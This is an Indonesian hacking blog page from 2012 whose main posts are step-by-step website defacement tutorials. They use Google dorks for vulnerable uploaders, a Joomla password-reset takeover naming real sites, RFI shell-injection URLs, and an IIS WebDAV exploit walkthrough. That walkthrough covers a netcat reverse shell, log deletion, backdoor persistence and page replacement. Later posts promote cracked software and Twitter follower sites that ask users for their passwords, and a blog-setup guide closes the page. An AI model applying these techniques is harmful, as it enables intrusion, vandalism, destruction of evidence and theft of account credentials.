Saturday, December 15, 2012

Cara Deface Web Dengan Mudah

Mau menjadi defacer dengan cara yang mudah? Mau deface website tanpa harus otak atik ita itu ita itu? Ok, anda bisa mencoba hal berikut untuk membuat anda terasa seperti defacer.


Ikuti langkah - langkah berikut :

  1. Klik dulu di sini
  2. Ketik inurl:examples.uploadbutton.html pada kotak pencarian google
  3. Dihasil pencarian google terdapat beberapa link, pilih salah satu untuk di deface
  4. Contoh : http://modelku.com/Public/Js/kindeditor/examples/uploadbutton.html
  5. Sekarang kalian upload script deface kalian dengan cara klik upload, pilih script defacenya, klik "open"
  6. Tunggu beberapa saat, nanti akan muncul sebuah url
  7. Copy url tersebut ke address bar, tepatnya setelah tulisan modelku.com
  8. Enter

7. Selesai, kini anda seolah - olah telah mendeface situs tersebut. Tapi ingat! Kalian tidak benar - benar mendeface website tersebut. Kita hanya mainan deface pakai kindeditor saja, bukan beneran :D

Deface Web Dengan Mudah

Deface WEB Ala anonymouse

1. Masuk http://www.google.com/
2. klik/search inurl:option=com_user daerah | tujuancontoh: inurl:option=com_user malaysia
3. misalkan dapet korban
http://starsmoon.nazuka.net/home/index.php?>option=com_user&task=register<

lihat tulisan yang ada tanda ">option=com_user&task=register<" akan di ganti dengan :


option=com_user&view=reset&layout=confirm

Jadi penulisannya...
http://starsmoon.nazuka.net/option=com_user&view=reset&layout=confirm

4. Nah di situ akan keluar token
   token tersebut di isi dengan tanda.... { ' } << Yang Bertanda Kutip satu '

Keterangan : itu adalah tanda di mana kita bisa menjadikan suatu token menjadi
eror....ckckckckckckck.... { kalo kata saya si dah kodrat.... }

5. Terus kalo berhasil km akan di bawa menuju
    tempat mengisi password baru dan konfirmasi password baru....

isi lah dengan sesuka hati.....

lanjut...................

6. langah berikutnya
setelah di berhasil isi pass tersebut anda harus login lagi dengan nama/ username

User : Admin
Pas   : nah kalo passwordnya yaitu adalah password yang baru anda buat tadi.....

7. Nah bagaimana ketahuan anda sudah masuk k adminnya????/ anda sudah menjadi admin nya....
yaitu adalah pasti kalo anda sudah bisa masuk ada gambar pensil dan ketas baru edit....
itu bila anda ingin deface halaman depan nya saja
ini contoh korbannya:
http://starsmoon.nazuka.net/

8. Lanjut....kalo anda ingin deface full seperti ini http://starsmoon.nazuka.net/

anda masuk ke emmmm...contoh tadi
http://starsmoon.nazuka.net/

9. rubah jadi http://konsultasimuamalat.com/home/administrator/
itu dari slalu ngantuk saya bljar.....

10. masuk ke bagian tempeate kalo g salah adanya di extension...
klik tempelates masuk terus liat layouts yang sedang di pakai adminnya..../ yang ada gambar bintangnya....
terus klik lalu klik edit terus klik edit html
masukan semua html kamu di situ...... afro afro

nah selesai dah....


NB : TOKEN KADANG BERHASIL KADANG TIDAK ( ' )

Deface Web Via RFI

Cara Mudah Deface Remote File Include
Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com
- Site Oneadmin RFI
Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
- PnPhpBB2
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..
Nah setelah itu buadlah sebuad file: index.html
Isi dengan:
<html>
Hacked by Nama Kamu
</html>
Kemudian upload deh file ke directorynya
kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html
Enjoy

Hacking Menggunakan IIS

1) Pendahuluan
Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!
2) Adanya Celah Keamanan
Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.
Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.
Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa<shell_code_anda>
Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.
Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.
Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J
3) Mengeksploitasi celah keamanan dan Mengendalikan webserver
Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan  exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.
D:\vcproject\webdave\debug>web.exe
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
syntax: D:\WEB.EXE <host_target> <host_anda> <port_anda> [padding]
Cool !!!  Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:
D:\vcproject\webdave\debug>web.exe  123.123.123.123  200.200.200.200  6666
Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
connect to 200.200.200.200 from 123.123.123.123
Microsoft(R) Windows 2000
(C)Copyright Microsoft Corp 1981-2000.
C:\winnt\system32>
Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.
4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?
Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.
C:\winnt\system32> rmdir /s /q logfiles
Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.
Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.
Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah  C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:
C:\inetpub\wwwroot> copy index.html indexold.html
C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:
C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:
C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.
5) Kesimpulan
Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.

Saturday, November 24, 2012

Internet Download Manager Full Version (NEW)

IDM Free Download, Internet Download Manager Terbaru Full Version. Software IDM berfungsi untuk mempercepat download file di internet. Internet Download Manager versi terbaru idm yang bisa anda download dibawah ini secara lengkap dengan versi full version. IDM free download Full terbaru ini juga telah bebas virus lewat deteksi antivirus.
Berikut dapat segera Anda download Software IDM Internet Download Manager full version file.
Setelah download segera Extract file rar nya dan dapat langsung Anda install software Internet Download Manager Full nya. Setelah itu jalankan dan ikuti instruksi yang ada.
Sebagai software yang sangat penting dalam download file IDM atau internet download manager ini juga dapat digunakan untuk men download video yotube dan di share lewat facebook. Tunggu apa lagi, Segera download IDM nya dan selamat ber download ria bersama idm free full version ini.

Thursday, November 22, 2012

KUMPULAN URL atau LINK TWITTER AUTO FOLLOWERS

Berikut KUMPULAN URL atau LINK TWITTER AUTO FOLLOWERS

1. http://plusfollower.info/
2. http://newfollow.info/
3. http://followback.info/
4. http://hitfollow.info/
5. http://letgetmorefollowers.info/

 jadi gini cara penyelesaian nya :
1.buka www.twitter.com lalu login.
2.click semua url atau link diatas.
3.setelah semua di click , masukkan usename dan password twitter kamu di smua link di atas (kalau tidak ada tempat login nya , kamu bisa mengclick sign with twitter dan start now) jangan takut ! akun kamu aman ! kalau takut coba aja login pake akun palsu.
4.jangan lupa ceklist atau centang bagian ini Accept Terms Of User
5. sampai detik ini apabila semua web diatas anda jalankan secara bersamaan , minimal 200 followers per hari untuk akun twitter anda.
6. web-web diatas hanya bisa digunakan 1 kali dalam 24 jam !
KUMPULAN URL atau LINK TWITTER AUTO FOLLOWERS

Tambahan
http://spreadyourtweets.org/
http://yesfollow.info/
http://www.tweetbig.com/
http://socialadding.com/
http://100follower.org

nih buktinya @Farhan_Fauzan00
hanya dalam 3 hari  followers udah 363.
jangan lupa di follow ya gan @Farhan_Fauzan00


Cara Membuat Blog Gratis Dengan Mudah dan Cepat

Membuat Blog Dengan Mudah dan Cepat - Belajar Membuat Blog Gratis - Artikel kali ini saya khususkan bagi sobat yang benar benar awam mengenai cara membuat blog gratis, jadi bagi sobat yang sudah memahami dan menguasai ilmu cara membuat blog abaikan saja artikel ini. 
Sebenarnya ada banyak layanan yang menyediakan blog gratis, beberapa diantaranya :

- Blogger.com
- Wordpress.com
- Blogdetik.com
- Blog-roll.info
- Wordblog.pl
- dan masih banyak lagi.

Namun kali ini saya akan menerangkan bagaimana Cara membuat blog gratis secara cepat dan mudah. yaitu kita memakai layanan Blogspot di blogger.com.

Langkah awal untuk membuat sebuah blog gratis adalah :


1. Sobat diwajibkan memiliki sebuah alamat email, saran saya pakailah layanan gmail dari google. untuk membuat email dari layanan google tersebut anda bisa langsung menuju ke Gmail, untuk lebih jelasnya perhatikan gambar dibawah ini.


2. Langkah selanjutnya isi data data diform yang disediakan, jangan lupa paling bawah klik Saya menyetujui persyaratan layanan dan kebijakan privacy google, setelah itu klik Langkah berikutnya lihat gambar dibawah.

3. Selanjutnya, klik kirim kode Verifikasi. lihat lagi gambar dibawah ya :)


4. sekarang cek ponsel anda, jika belum ada kode verifikasi dari google bisa dicoba lagi beberapa menit kemudian, gambar dibawah menggunakan modem, jadi kode verifikasinya langsung bisa di lihat dilayar laptop saya.

5. Masukin deh kode verifikasinya seperti dibawah ini


6. Selamat datang di akun Gmail anda, lalu klik Lanjutkan ke Gmail ya....



7. Sampai disini proses pembuatan akun Gmail sudah berhasil, sekarang ketahap selanjutnya ya...proses pembuatan blog. yaudah tanpa basa basi langsung buka tab baru di browser sobat ya, atau bisa langsung menekan (ctrl + T) buka blogger.com ya.... tinggal isi email dan sandi yang sama seperti di akun Gmail tadi. lalu klik Masuk


8. selanjutnya pilih Opsi profil blogger sobat, jika hanya membuat blogger sebaiknya klik yg sebelah kanan. lalu klik lanjutkan ke blogger.



9. Sampai tahap ini sobat sudah sukses membuat akun blog, tahap selanjutnya silahkan lihat gambar dibawah ini untuk jelasnya. perhatikan baik baik tahap 1, 2, dan 3. sebelum ada tulisan This blog address is available berarti nama blog yang ingin sobat buat sudah ada yang memiliki, silahkan ganti dengan nama lain, atau untuk mudahnya bisa tambahkan angka dibelakang alamat blognya, lihat contoh yang saya lingkari pada nomer 2 dibawah. setelah itu klik create blog.



10. Nah sekarang blog sobat sudah jadi, lihat keterangan dibawah ini, angka 1 adalah Judul blog yang sobat ciptakan pada tahap sebelumnya, lalu angka 2 adalah start posting. alias untuk memulai membuat artikel.


11. Setelah sobat klik start posting, sekarang saatnya sobat membuat sebuah artikel... perhatikan baik baik langkah langkahnya dalam membuat sebuah artikel. tentunya dimulai dari angka 1 ya...hehehe... untuk jelasnya lihat gambar dibawah ini.

Langkah-langkah cara membuat artikel di blog :

Angka 1 : merupakan judul artikel yang nanti akan diterbitkan, boleh apa saja. silahkan berekspresi melalui artikel sobat, narsis juga ga ada yang larang koq :)

Angka 2 : merupakan isi dari artikel, silahkan mengarang bebas, mau curhat, kasih tips, trik, info, atau apa saja yang sobat ketahui, klo artikelnya bermanfaat pasti banyak yang suka dengan blog sobat deh.

Angka 3 : merupakan Label, silahkan isi apa saja. contohnya seperti ini, misalnya judul artikel yang sobat buat adalah Tips melangsingkan tubuh, nah label tersebut bisa di isi dengan Tips sehat, atau yang lainnya. kan ga nyambung seandainya label tsb di isi dengan Ilmu komputer. :p

Angka 4 : Nah tahap ini adalah melihat dulu artikel sebelum diterbitkan, jika ada yang salah bisa dibenarkan dulu sebelum artikel diterbitkan.

Angka 5 : Jika pada tahap 4 sobat sudah yakin, sekarang tinggal klik Publish (Terbitkan)


12. Gambar dibawah ini merupakan contoh artikel yang sudah berhasil diterbitkan. dan untuk melihat artikelnya silahkan klik tombol view. selesai.... nah mudah bukan ?



13. Selamat Berkarya ya sob, eitss baca juga artikel sebelum nya.thank's :)